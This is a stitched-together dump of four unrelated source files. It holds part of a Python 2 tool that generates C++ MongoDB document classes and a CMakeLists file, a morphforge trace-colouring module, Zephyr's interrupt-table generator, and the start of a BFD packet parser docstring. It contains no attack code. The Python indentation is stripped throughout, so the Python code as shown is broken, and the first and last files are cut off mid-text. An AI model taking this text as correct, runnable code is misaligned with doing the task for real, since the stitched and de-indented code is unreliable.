${class_name}& operator=(const ${class_name} &other) { CopyFrom(other); return *this; }
virtual void CopyFrom(const Value &other);
virtual Value* Clone() const { return new ${class_name}(*this); }
void Clear();
virtual int ParseField(const std::string &name, const rapidjson::Value &json_value);
${field_accessors}
private:
inline bool has_bit(unsigned int field_number) const
{
return (_has_bits_ & ((unsigned long long)1 << field_number)) != 0;
}
inline void set_has_bit(unsigned int field_number)
{
_has_bits_ |= ((unsigned long long)1 << field_number);
}
inline void clear_has_bit(unsigned int field_number)
{
_has_bits_ &= ~((unsigned long long)1 << field_number);
}
${field_bit_methods}
private:
${field_var_defs}
unsigned long long _has_bits_;
};
${namespace_end}
#endif // ${header_guard}
'''
document_cpp_template = '''\
#include "${h_filename}"
#define FIX_FIELD(field_name, field_class) \\
do {\\
if (has_##field_name()) {\\
field_name##_ = (field_class*)GetField(#field_name);\\
}\\
else {\\
field_name##_ = NULL;\\
}\\
} while (0)
#define HANDLE_FIELD(field_name, field_class) \\
do {\\
if (name.compare(#field_name) == 0) {\\
field_name##_ = new field_class(name);\\
if (field_name##_->FromJsonValue(json_value)) {\\
fields_.push_back(field_name##_);\\
set_has_##field_name();\\
return 1;\\
}\\
else {\\
delete field_name##_;\\
field_name##_ = NULL;\\
return -1;\\
}\\
}\\
} while (0)
${namespace_begin}
${class_name}::${class_name}()
: ${field_initiators}
, _has_bits_(0)
{
}
${class_name}::~${class_name}()
{
Clear();
}
void ${class_name}::CopyFrom(const Value &other)
{
if (this == &other) {
return;
}
Clear();
Document::CopyFrom(other);
if (is_null_) {
return;
}
const ${class_name} &doc = dynamic_cast<const ${class_name}&>(other);
_has_bits_ = doc._has_bits_;
${copyfrom_fix_fields_section}
}
void ${class_name}::Clear()
{
Document::Clear();
_has_bits_ = 0;
${clear_fields_section}
}
int ${class_name}::ParseField(const std::string &name, const rapidjson::Value &json_value)
{
${parsefield_handle_fields_section}
return 0;
}
${field_methods_impl}
${namespace_end}
'''
CMakeLists_template = '''\
project(%(project_name)s C CXX)
cmake_minimum_required(VERSION 2.8)
message(STATUS "PROJECT_SOURCE_DIR: ${PROJECT_SOURCE_DIR}")
# Possible values of CMAKE_BUILD_TYPE are empty, Debug, Release, RelWithDebInfo and MinSizeRel
set(CMAKE_BUILD_TYPE Debug)
message(STATUS "Build Type: " ${CMAKE_BUILD_TYPE})
set(EXECUTABLE_OUTPUT_PATH ${PROJECT_SOURCE_DIR})
message(STATUS "EXECUTABLE_OUTPUT_PATH: ${EXECUTABLE_OUTPUT_PATH}")
# mongodb C driver
find_package(PkgConfig)
pkg_check_modules(LIBMONGOC REQUIRED libmongoc-1.0)
include_directories(${LIBMONGOC_INCLUDE_DIRS})
# rapidjson
include_directories(${PROJECT_SOURCE_DIR}/thirdparty/rapidjson/include)
# mongoodm
set(MONGOODM_DIR ${PROJECT_SOURCE_DIR}/thirdparty/mongo_obj_doc_mapper)
set(MONGOODM_INCLUDE ${MONGOODM_DIR})
include_directories(${MONGOODM_INCLUDE})
set(SRCS %(srcs)s)
add_executable(%(exe_name)s ${SRCS} ${MONGOODM_DIR}/mongoodm/mongoodm_all.cpp)
set_target_properties(%(exe_name)s PROPERTIES OUTPUT_NAME %(exe_name)s)
target_link_libraries(%(exe_name)s ${LIBMONGOC_LIBRARIES})
'''
def get_namespace_begin(namespace):
return '' if not namespace else '\nnamespace %s {\n' % namespace
def get_namespace_end(namespace):
return '' if not namespace else '\n} // namespace %s\n' % namespace
def get_header_guard(namespace, class_name):
return '%s_%s_H_' % (namespace.upper(), inflection.underscore(class_name).upper())
def construct_embeded_document_type_name(*args):
return '_'.join(args)
def get_field_number_tag(field_name):
return 'k%sFieldNumber' % inflection.camelize(field_name)
def parse_document(document_element, document_type_name, is_embeded, documents):
print 'Parsing document %s...' % document_type_name
#xml.etree.cElementTree.dump(document_element)
if 'skip' in document_element.attrib and document_element.attrib['skip'] == 'true':
print 'Skipped'
return True
document = {}
document['name'] = document_type_name
document['is_embeded'] = is_embeded
document['fields'] = []
for field_element in document_element.findall('field'):
field = {}
if 'name' not in field_element.attrib:
            print 'document %s: field has no name attribute' % document['name']
return False
field['name'] = field_element.attrib['name']
#print 'Parsing %s.%s...' % (document['name'], field['name'])
if 'type' not in field_element.attrib:
            print 'document %s: field has no type attribute' % document['name']
return False
field['type'] = field_element.attrib['type']
if field['type'] == 'document':
if 'ref' in field_element.attrib:
field['ref'] = field_element.attrib['ref']
elif len(field_element) > 0:
field['ref'] = construct_embeded_document_type_name(document['name'], field['name'])
parse_document(field_element, field['ref'], True, documents)
else:
                print 'document %s field %s: undefined document type' % (document['name'], field['name'])
return False
if field['ref'] in basic_data_type_dict:
field['value_class_name'] = basic_data_type_dict[field['ref']]['value']
else:
field['value_class_name'] = field['ref']
field['class_name'] = 'mongoodm::GenericField<%s>' % field['value_class_name']
field['raw_value_type'] = field['value_class_name']
elif field['type'] == 'array':
if 'ref' in field_element.attrib:
field['ref'] = field_element.attrib['ref']
elif len(field_element) > 0:
field['ref'] = construct_embeded_document_type_name(document['name'], field['name'], 'Member')
parse_document(field_element, field['ref'], True, documents)
else:
                print 'document %s field %s: unknown array member type' % (document['name'], field['name'])
return False
if field['ref'] in basic_data_type_dict:
field['array_member_class_name'] = basic_data_type_dict[field['ref']]['value']
else:
field['array_member_class_name'] = field['ref']
field['class_name'] = 'mongoodm::ArrayField<%s>' % field['array_member_class_name']
field['value_class_name'] = 'mongoodm::GenericArrayValue<%s>' % field['array_member_class_name']
else:
field['value_class_name'] = basic_data_type_dict[field['type']]['value']
field['class_name'] = basic_data_type_dict[field['type']]['field']
field['raw_value_type'] = basic_data_type_dict[field['type']]['raw_value_type']
field['setter_params'] = basic_data_type_dict[field['type']]['setter_params']
field['setter_args'] = basic_data_type_dict[field['type']]['setter_args']
document['fields'].append(field)
documents[document['name']] = document
#pprint.pprint(document)
return True
def parse_documents(document_elements):
if not document_elements:
        print 'database has no document elements'
return {}
documents = {}
for document_element in document_elements:
if 'name' not in document_element.attrib:
            print 'document has no name attribute'
return False
document_name = inflection.camelize(document_element.attrib['name'])
assert parse_document(document_element, document_name, False, documents), 'Parsing document failed: %s' % document_element
return documents
def parse(filename):
"""Entry point of config file parser"""
if not os.access(filename, os.R_OK):
print 'File "%s" does not exist or you do not have read permission' % filename
return None
db = {}
    tree = xml.etree.cElementTree.parse(filename)
root = tree.getroot()
assert root.tag == 'database'
if 'name' not in root.attrib:
        print 'database has no name attribute'
return None
db['name'] = root.attrib['name']
db['namespace'] = ''
if 'namespace' in root.attrib:
db['namespace'] = root.attrib['namespace']
db['documents'] = parse_documents(root.findall("document"))
return db
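# A minimal, hypothetical example of the config layout that parse() accepts
# (for illustration only):
#
#   <database name="mydb" namespace="mydb">
#     <document name="user">
#       <field name="_id" type="objectid"/>
#       <field name="name" type="string"/>
#       <field name="age" type="int32"/>
#       <field name="emails" type="array" ref="string"/>
#     </document>
#   </database>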
def generate_document_code(document, namespace, output_dir, is_overwrite_mode):
print 'Generating document %s...' % document['name']
document['class_name'] = document['name']
    document['h_filename'] = '%s.h' % document['name'].lower()
    document['cpp_filename'] = '%s.cpp' % document['name'].lower()
index = 0
include_files = []
field_number_defs = []
field_accessors = []
field_bit_methods = []
field_var_defs = []
for field in document['fields']:
# include_files
if field['type'] not in basic_data_type_dict:
if field['type'] != 'array' or field['ref'] not in basic_data_type_dict:
include_files.append('#include "%s.h"' % field['ref'].lower())
# field_number_defs
field_number_def = string.Template(document_h_field_number_def_template).substitute(
field_number_tag=get_field_number_tag(field['name']),
field_number=index)
index += 1
field_number_defs.append(field_number_def)
# field_accessors
if field['type'] == 'array':
field_accessor = string.Template(document_h_array_field_accessor_template).substitute(
field_name=field['name'],
field_value_class_name=field['value_class_name'],
array_member_class_name=field['array_member_class_name'],
field_number_tag=get_field_number_tag(field['name']))
else:
field_accessor = string.Template(document_h_basic_field_accessor_template).substitute(
field_name=field['name'],
field_value_class_name=field['value_class_name'],
field_number_tag=get_field_number_tag(field['name']))
if field['type'] == 'datetime':
field_accessor += string.Template(document_h_datetime_field_raw_getter_template).substitute(
field_name=field['name'])
elif field['type'] in basic_data_type_dict and field['type'] not in ('document', 'binary'):
field_accessor += string.Template(document_h_basic_field_raw_getter_template).substitute(
field_name=field['name'],
field_value_raw_type=field['raw_value_type'])
# field setter
if field['type'] == 'datetime':
field_accessor += string.Template(document_h_datetime_field_setter_template).substitute(
field_name=field['name'])
elif field['type'] in basic_data_type_dict and field['type'] != 'document':
field_accessor += string.Template(document_h_basic_field_setter_template).substitute(
field_name=field['name'],
field_setter_params=field['setter_params'],
field_setter_args=field['setter_args'])
field_accessors.append(field_accessor)
# field_bit_methods
field_bit_methods.append(string.Template(document_h_field_bit_method_template).substitute(
field_name=field['name'],
field_number_tag=get_field_number_tag(field['name'])))
# field_var_defs
field_var_defs.append(string.Template(document_h_field_var_def_template).substitute(
field_name=field['name'],
field_class_name=field['class_name']))
document_h_pathname = os.path.join(output_dir, document['h_filename'])
if os.path.exists(document_h_pathname) and not is_overwrite_mode:
print 'File %s exists' % document_h_pathname
return False, document['cpp_filename']
document_h_content = string.Template(document_h_template).substitute(
namespace_begin=get_namespace_begin(namespace),
namespace_end=get_namespace_end(namespace),
header_guard=get_header_guard(namespace, document['class_name']),
include_file_list='\n'.join(include_files),
class_name=document['class_name'],
field_number_defs='\n'.join(field_number_defs),
field_accessors='\n'.join(field_accessors),
field_bit_methods='\n'.join(field_bit_methods),
field_var_defs='\n'.join(field_var_defs))
with open(document_h_pathname, 'w') as f_header:
f_header.write(document_h_content)
print '%s generated' % document_h_pathname
document_cpp_pathname = os.path.join(output_dir, document['cpp_filename'])
if os.path.exists(document_cpp_pathname) and not is_overwrite_mode:
print 'File %s exists' % document_cpp_pathname
return False, document['cpp_filename']
field_initiators_list = []
copyfrom_fix_fields_list = []
clear_fields_list = []
parsefield_handle_fields_list = []
field_methods_impl_list = []
for field in document['fields']:
field_initiators_list.append('%s_(NULL)' % field['name'])
copyfrom_fix_fields_list.append(' FIX_FIELD(%s, %s);' % (field['name'], field['class_name']))
clear_fields_list.append('\t%s_ = NULL;' % field['name'])
parsefield_handle_fields_list.append(' HANDLE_FIELD(%s, %s);' % (field['name'], field['class_name']))
if field['type'] != 'array':
field_methods_impl_list.append(string.Template(document_cpp_basic_field_method_template).substitute(
class_name=document['class_name'],
field_name=field['name'],
field_class_name=field['class_name'],
field_value_class_name=field['value_class_name']))
else:
field_methods_impl_list.append(string.Template(document_cpp_array_field_method_template).substitute(
class_name=document['class_name'],
field_name=field['name'],
field_class_name=field['class_name'],
field_value_class_name=field['value_class_name'],
array_member_class_name=field['array_member_class_name']))
document_cpp_content = string.Template(document_cpp_template).substitute(
namespace_begin=get_namespace_begin(namespace),
namespace_end=get_namespace_end(namespace),
h_filename=document['h_filename'],
class_name=document['class_name'],
field_initiators='\n\t, '.join(field_initiators_list),
copyfrom_fix_fields_section='\n'.join(copyfrom_fix_fields_list),
clear_fields_section='\n'.join(clear_fields_list),
parsefield_handle_fields_section='\n'.join(parsefield_handle_fields_list),
field_methods_impl='\n'.join(field_methods_impl_list))
with open(document_cpp_pathname, 'w') as f_source:
f_source.write(document_cpp_content)
print '%s generated' % document_cpp_pathname
return True, document['cpp_filename']
def generate_CMakeLists(db, output_dir, is_overwrite_mode, src_list):
CMakeLists_pathname = os.path.join(output_dir, 'CMakeLists.txt')
if os.path.exists(CMakeLists_pathname) and not is_overwrite_mode:
print 'File %s exists' % CMakeLists_pathname
return False
CMakeLists_content = CMakeLists_template % dict(
project_name='myapp',
exe_name='myapp',
srcs=' '.join(src_list))
with open(CMakeLists_pathname, 'w') as f:
f.write(CMakeLists_content)
print '%s generated' % CMakeLists_pathname
return True
def generate_code(db, output_dir, is_overwrite_mode):
src_list = []
for document_name, document in db['documents'].iteritems():
is_successful, src_file_name = generate_document_code(document, db['namespace'], output_dir, is_overwrite_mode)
if not is_successful:
return False
src_list.append(src_file_name)
if not generate_CMakeLists(db, output_dir, is_overwrite_mode, src_list):
return False
print 'done!'
return True
def main():
arg_parser = argparse.ArgumentParser(description=description)
arg_parser.add_argument('--version', action='version', version='%(prog)s ' + __version__, help='version number')
arg_parser.add_argument('-o', '--output', default='.', help='output directory')
arg_parser.add_argument('--overwrite', action='store_true', help='if overwrite existing code files')
arg_parser.add_argument('db_config', default=default_config_filename, action='store', help='database config file name')
args = arg_parser.parse_args()
print 'Database config file: %s' % args.db_config
print 'Output directory: %s' % os.path.abspath(args.output)
print 'Overwrite mode: %s' % args.overwrite
if not os.path.exists(args.output):
os.makedirs(args.output)
print 'Parsing config file %s ...' % args.db_config
dbcfg = parse(args.db_config)
if not dbcfg:
return E_PARSE
print 'Generating code ...'
if not generate_code(dbcfg, os.path.abspath(args.output), args.overwrite):
return E_GENERATE_CODE
return 0
if __name__ == "__main__":
sys.exit(main())
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
import re
from collections import defaultdict
from itertools import chain
import __builtin__ as bi
def _get_collision_of_color_index_for_group(colorIndex, group, plotspec_to_traces_dict, allocated_trace_colors):
collisions = 0
for (_ps, ps_traces) in plotspec_to_traces_dict.iteritems():
ps_allocated_indices = [allocated_trace_colors.get(tr, None) for tr in ps_traces ]
ps_allocated_indices = [a for a in ps_allocated_indices if a is not None]
clashes = ps_allocated_indices.count(colorIndex)
# Does this group have anything that would go into this plot-spec?
# If not, then it doesn't matter about collisions!
n_group_in_ps = set(group) & set(ps_traces)
if len(n_group_in_ps) > 0:
collisions += clashes
return collisions + 1
class LinkageRule(object):
def __call__(self, all_traces):
"""returns a sequence of tuples, containing the traces that are connected to each other"""
raise NotImplementedError()
class LinkageRuleTagRegex(object):
def __init__(self, regex):
self.regex = re.compile(regex, re.VERBOSE)
def get_match_tags(self, tr):
matches = []
for tag in tr.tags:
if self.regex.match(tag):
matches.append(tag)
return matches
def __call__(self, all_traces):
grps = defaultdict(list)
for trace in all_traces:
match_tags = self.get_match_tags(trace)
for matchtag in match_tags:
grps[matchtag].append(trace)
return grps.values()
from morphforge.traces.tags import TagSelector
class LinkageRuleTag(object):
def __init__(self, tagselector, preferred_color=None):
if isinstance(tagselector, basestring):
self._tagselector = TagSelector.from_string(tagselector)
else:
self._tagselector = tagselector
self.preferred_color = preferred_color
def match(self, trace):
return self._tagselector(trace)
def __call__(self, all_traces):
matches = [trace for trace in all_traces if self.match(trace)]
if len(matches) in [0, len(all_traces)]:
assert False, 'All or none selected, an error has probably been made! (%s)' % (self._tagselector)
return [matches]
class AbstrLinkage(object):
""" Linkage classes are used to choose colours for TagViewer plots.
They are called 'linkages' because they make links between traces across
different plots. For example, suppose we have graphs of membrane voltage
and current flow; we may wish to specify that all the traces of
Neuron1 are in blue and all those of Neuron2 are in green.
"""
def process(self, plotspec_to_traces_dict):
""" Preprocessing of linkages before plotting.
TagViewer will assign traces to the plotspecs, then call this function.
"""
raise NotImplementedError()
def get_trace_color(self, trace):
"""Returns the colour code for the *trace"""
raise NotImplementedError()
#class ColorAssigner(object):
# def __init__(self, color_rules):
# self._color_rules = color_rules
class StandardLinkages(object):
def __init__(self, linkages_explicit=None, linkage_rules=None, color_rules=None):
self._linkages_explicit = linkages_explicit or []
self._color_cycle = ['blue', 'green', 'red', 'cyan', 'yellow', 'black']
self.linkage_rules = (linkage_rules if linkage_rules else [])
self._color_allocations = None
self._color_assigner = (color_rules if color_rules else [])
def get_trace_color(self, tr):
return self._color_allocations[tr]
def _get_linkages_from_rules(self, all_traces):
links = chain(*[link_rule(all_traces) for link_rule in self.linkage_rules])
return list(links)
def process(self, plotspec_to_traces_dict):
""" Assign colours to the traces. We aim to minise color clashes, but
still only use one color for a given trace, even if it appears on multiple plots.
1/ We build a graph, in which each node represents trace, and edges represent 'linkage'
2/ We look at the connected components, i.e. the traces that should all have the same color_indices
3/ If we have more groups than colours, then we allocate 'color indices to these groups based
on mimising color collisions the plots.
## TODO: 4/ Actual colour is assigned by the color_assigner.
"""
import networkx
new_colors = [ linkage_rule.preferred_color for linkage_rule in self.linkage_rules if linkage_rule.preferred_color]
new_colors = [c for c in new_colors if c not in self._color_cycle]
colors = new_colors + self._color_cycle
all_traces = set(chain(*plotspec_to_traces_dict.values()))
allocated_trace_colors = {}
color_indices = range(len(colors))
G = networkx.Graph()
# Add a node per trace:
for trace in all_traces:
G.add_node(trace)
# Add the edges:
all_links = self._linkages_explicit + self._get_linkages_from_rules(all_traces)
for link in all_links:
(first, remaining) = (link[0], link[1:])
for r in remaining:
G.add_edge(first, r)
groups = networkx.connected_components(G)
for grp in sorted(groups, key=lambda g: (len(g), id(g[0])), reverse=True):
#Calculate how many collisions we would have for each allocation:
def index_score(i):
s = _get_collision_of_color_index_for_group(colorIndex=i,
group=grp,
plotspec_to_traces_dict=plotspec_to_traces_dict,
allocated_trace_colors=allocated_trace_colors)
return s
new_index = bi.min(color_indices, key=index_score)
# Allocate to colorIndex:
for g in grp:
allocated_trace_colors[g] = new_index
# We have now assigned a colour index to each group; all that remains is
# to map each index onto an actual colour:
self._color_allocations = {}
for trace in all_traces:
# Normal behaviour: wrap around the colour cycle if there are
# more groups than colours.
color_index = allocated_trace_colors[trace]
self._color_allocations[trace] = self._color_cycle[color_index % len(self._color_cycle)]
# Allow overriding:
for l in self.linkage_rules:
if l.match(trace) and l.preferred_color:
self._color_allocations[trace] = l.preferred_color
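# A minimal usage sketch (illustrative, not taken from the morphforge docs):
# the tag-selector strings and trace objects below are hypothetical, and
# plotspec_to_traces_dict is whatever TagViewer builds before calling
# process(), as described in the AbstrLinkage docstring above.
#
#   linkage = StandardLinkages(linkage_rules=[
#       LinkageRuleTag('ALL{Neuron1}', preferred_color='blue'),
#       LinkageRuleTag('ALL{Neuron2}', preferred_color='green'),
#   ])
#   linkage.process(plotspec_to_traces_dict)
#   color = linkage.get_trace_color(some_trace)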
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import argparse
import struct
import sys
import os
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
ISR_FLAG_DIRECT = (1 << 0)
# The below few hardware independent magic numbers represent various
# levels of interrupts in a multi-level interrupt system.
# 0x000000FF - represents the 1st level (i.e. the interrupts
# that directly go to the processor).
# 0x0000FF00 - represents the 2nd level (i.e. the interrupts funnel
# into 1 line which then goes into the 1st level)
# 0x00FF0000 - represents the 3rd level (i.e. the interrupts funnel
# into 1 line which then goes into the 2nd level)
FIRST_LVL_INTERRUPTS = 0x000000FF
SECND_LVL_INTERRUPTS = 0x0000FF00
THIRD_LVL_INTERRUPTS = 0x00FF0000
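# Worked example: an encoded IRQ number of 0x0000020B denotes a 2nd-level
# interrupt: (irq & SECND_LVL_INTERRUPTS) >> 8 == 2 is the line on the
# aggregator, and irq & FIRST_LVL_INTERRUPTS == 0x0B is the 1st-level IRQ
# line that the aggregator's output is wired to (see main() below).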
def debug(text):
if args.debug:
sys.stdout.write(os.path.basename(sys.argv[0]) + ": " + text + "\n")
def error(text):
sys.stderr.write(os.path.basename(sys.argv[0]) + ": " + text + "\n")
raise Exception()
def endian_prefix():
if args.big_endian:
return ">"
else:
return "<"
def read_intlist(intlist_path):
"""read a binary file containing the contents of the kernel's .intList
section. This is an instance of a header created by
include/linker/intlist.ld:
struct {
u32_t num_vectors; <- typically CONFIG_NUM_IRQS
struct _isr_list isrs[]; <- Usually of smaller size than num_vectors
}
Followed by instances of struct _isr_list created by IRQ_CONNECT()
calls:
struct _isr_list {
/** IRQ line number */
s32_t irq;
/** Flags for this IRQ, see ISR_FLAG_* definitions */
s32_t flags;
/** ISR to call */
void *func;
/** Parameter for non-direct IRQs */
void *param;
};
"""
intlist = {}
prefix = endian_prefix()
intlist_header_fmt = prefix + "II"
intlist_entry_fmt = prefix + "iiII"
with open(intlist_path, "rb") as fp:
intdata = fp.read()
header_sz = struct.calcsize(intlist_header_fmt)
header = struct.unpack_from(intlist_header_fmt, intdata, 0)
intdata = intdata[header_sz:]
debug(str(header))
intlist["num_vectors"] = header[0]
intlist["offset"] = header[1]
intlist["interrupts"] = [i for i in
struct.iter_unpack(intlist_entry_fmt, intdata)]
debug("Configured interrupt routing")
debug("handler irq flags param")
debug("--------------------------")
for irq in intlist["interrupts"]:
debug("{0:<10} {1:<3} {2:<3} {3}".format(
hex(irq[2]), irq[0], irq[1], hex(irq[3])))
return intlist
def parse_args():
global args
parser = argparse.ArgumentParser(description = __doc__,
formatter_class = argparse.RawDescriptionHelpFormatter)
parser.add_argument("-e", "--big-endian", action="store_true",
help="Target encodes data in big-endian format (little endian is "
"the default)")
parser.add_argument("-d", "--debug", action="store_true",
help="Print additional debugging information")
parser.add_argument("-o", "--output-source", required=True,
help="Output source file")
parser.add_argument("-k", "--kernel", required=True,
help="Zephyr kernel image")
parser.add_argument("-s", "--sw-isr-table", action="store_true",
help="Generate SW ISR table")
parser.add_argument("-V", "--vector-table", action="store_true",
help="Generate vector table")
parser.add_argument("-i", "--intlist", required=True,
help="Zephyr intlist binary for intList extraction")
args = parser.parse_args()
source_header = """
/* AUTO-GENERATED by gen_isr_tables.py, do not edit! */
#include <toolchain.h>
#include <linker/sections.h>
#include <sw_isr_table.h>
#include <arch/cpu.h>
#if defined(CONFIG_GEN_SW_ISR_TABLE) && defined(CONFIG_GEN_IRQ_VECTOR_TABLE)
#define ISR_WRAPPER ((u32_t)&_isr_wrapper)
#else
#define ISR_WRAPPER NULL
#endif
"""
def write_source_file(fp, vt, swt, intlist):
fp.write(source_header)
nv = intlist["num_vectors"]
if vt:
fp.write("u32_t __irq_vector_table _irq_vector_table[%d] = {\n" % nv)
for i in range(nv):
fp.write("\t{},\n".format(vt[i]))
fp.write("};\n")
if not swt:
return
fp.write("struct _isr_table_entry __sw_isr_table _sw_isr_table[%d] = {\n"
% nv)
for i in range(nv):
param, func = swt[i]
if isinstance(func, int):
func_as_string = "{0:#x}".format(func)
else:
func_as_string = func
fp.write("\t{{(void *){0:#x}, (void *){1}}},\n".format(param, func_as_string))
fp.write("};\n")
def get_symbols(obj):
for section in obj.iter_sections():
if isinstance(section, SymbolTableSection):
return {sym.name: sym.entry.st_value
for sym in section.iter_symbols()}
error("Could not find symbol table")
def getindex(irq, irq_aggregator_pos):
for indx, val in enumerate(irq_aggregator_pos):
if irq == val:
return indx
error("The IRQ %d has no match. Recheck interrupt configuration" % irq)
def main():
parse_args()
with open(args.kernel, "rb") as fp:
kernel = ELFFile(fp)
syms = get_symbols(kernel)
if "CONFIG_MULTI_LEVEL_INTERRUPTS" in syms:
if "CONFIG_2ND_LEVEL_INTERRUPTS" in syms:
if "CONFIG_NUM_2ND_LEVEL_AGGREGATORS" in syms:
num_aggregators = syms["CONFIG_NUM_2ND_LEVEL_AGGREGATORS"]
list_2nd_lvl_offsets = []
for i in range(num_aggregators):
offset_str = 'CONFIG_2ND_LVL_INTR_' + str(i).zfill(2) + '_OFFSET'
if offset_str in syms:
list_2nd_lvl_offsets.append(syms[offset_str])
debug(str(list_2nd_lvl_offsets))
if "CONFIG_3RD_LEVEL_INTERRUPTS" in syms:
if "CONFIG_NUM_3RD_LEVEL_AGGREGATORS" in syms:
num_aggregators = syms["CONFIG_NUM_3RD_LEVEL_AGGREGATORS"]
list_3rd_lvl_offsets = []
for i in range(num_aggregators):
offset_str = 'CONFIG_3RD_LVL_INTR_' + str(i).zfill(2) + '_OFFSET'
if offset_str in syms:
list_3rd_lvl_offsets.append(syms[offset_str])
debug(str(list_3rd_lvl_offsets))
intlist = read_intlist(args.intlist)
nvec = intlist["num_vectors"]
offset = intlist["offset"]
prefix = endian_prefix()
spurious_handler = "&_irq_spurious"
sw_irq_handler = "ISR_WRAPPER"
debug('offset is ' + str(offset))
debug('num_vectors is ' + str(nvec))
# Set default entries in both tables
if args.sw_isr_table:
# All vectors just jump to the common sw_irq_handler. If some entries
# are used for direct interrupts, they will be replaced later.
if args.vector_table:
vt = [sw_irq_handler for i in range(nvec)]
else:
vt = None
# Default to spurious interrupt handler. Configured interrupts
# will replace these entries.
swt = [(0, spurious_handler) for i in range(nvec)]
else:
if args.vector_table:
vt = [spurious_handler for i in range(nvec)]
else:
error("one or both of -s or -V needs to be specified on command line")
swt = None
for irq, flags, func, param in intlist["interrupts"]:
if (flags & ISR_FLAG_DIRECT):
if (param != 0):
error("Direct irq %d declared, but has non-NULL parameter"
% irq)
vt[irq - offset] = func
else:
# Regular interrupt
if not swt:
error("Regular Interrupt %d declared with parameter 0x%x "
"but no SW ISR_TABLE in use"
% (irq, param))
if not "CONFIG_MULTI_LEVEL_INTERRUPTS" in syms:
swt[irq - offset] = (param, func)
else:
# Figure out third level interrupt position
debug('IRQ = ' + hex(irq))
irq3 = (irq & THIRD_LVL_INTERRUPTS) >> 16
if irq3:
irq_parent = (irq & SECND_LVL_INTERRUPTS) >> 8
list_index = getindex(irq_parent, list_3rd_lvl_offsets)
irq3_baseoffset = syms["CONFIG_3RD_LVL_ISR_TBL_OFFSET"]
max_irq_per = syms["CONFIG_MAX_IRQ_PER_AGGREGATOR"]
irq3_pos = irq3_baseoffset + max_irq_per*list_index + irq3 - 1
debug('IRQ_Indx = ' + str(irq3))
debug('IRQ_Pos = ' + str(irq3_pos))
swt[irq3_pos - offset] = (param, func)
# Figure out second level interrupt position
if not irq3:
irq2 = (irq & SECND_LVL_INTERRUPTS) >> 8
if irq2:
irq_parent = (irq & FIRST_LVL_INTERRUPTS)
list_index = getindex(irq_parent, list_2nd_lvl_offsets)
irq2_baseoffset = syms["CONFIG_2ND_LVL_ISR_TBL_OFFSET"]
max_irq_per = syms["CONFIG_MAX_IRQ_PER_AGGREGATOR"]
irq2_pos = irq2_baseoffset + max_irq_per*list_index + irq2 - 1
debug('IRQ_Indx = ' + str(irq2))
debug('IRQ_Pos = ' + str(irq2_pos))
swt[irq2_pos - offset] = (param, func)
# Figure out first level interrupt position
if not irq3 and not irq2:
irq1 = (irq & FIRST_LVL_INTERRUPTS)
debug('IRQ_Indx = ' + str(irq1))
debug('IRQ_Pos = ' + str(irq1))
swt[irq1 - offset] = (param, func)
with open(args.output_source, "w") as fp:
write_source_file(fp, vt, swt, intlist)
if __name__ == "__main__":
main()
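# Example invocation (file names are illustrative; in practice the arguments
# are supplied by the Zephyr build system):
#
#   ./gen_isr_tables.py --kernel zephyr_prebuilt.elf --intlist isrList.bin \
#       --sw-isr-table --output-source isr_tables.c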
|
|
# Copyright (C) 2014 Xinguard, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
BFD Control packet parser/serializer
RFC 5880
BFD Control packet format
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Vers | Diag |Sta|P|F|C|A|D|M| Detect Mult | Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| My Discriminator |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Your Discriminator |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Desired Min TX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Required Min RX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Required Min Echo RX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
An optional Authentication Section MAY be present in the following
format of types:
1. Format of Simple Password Authentication Section
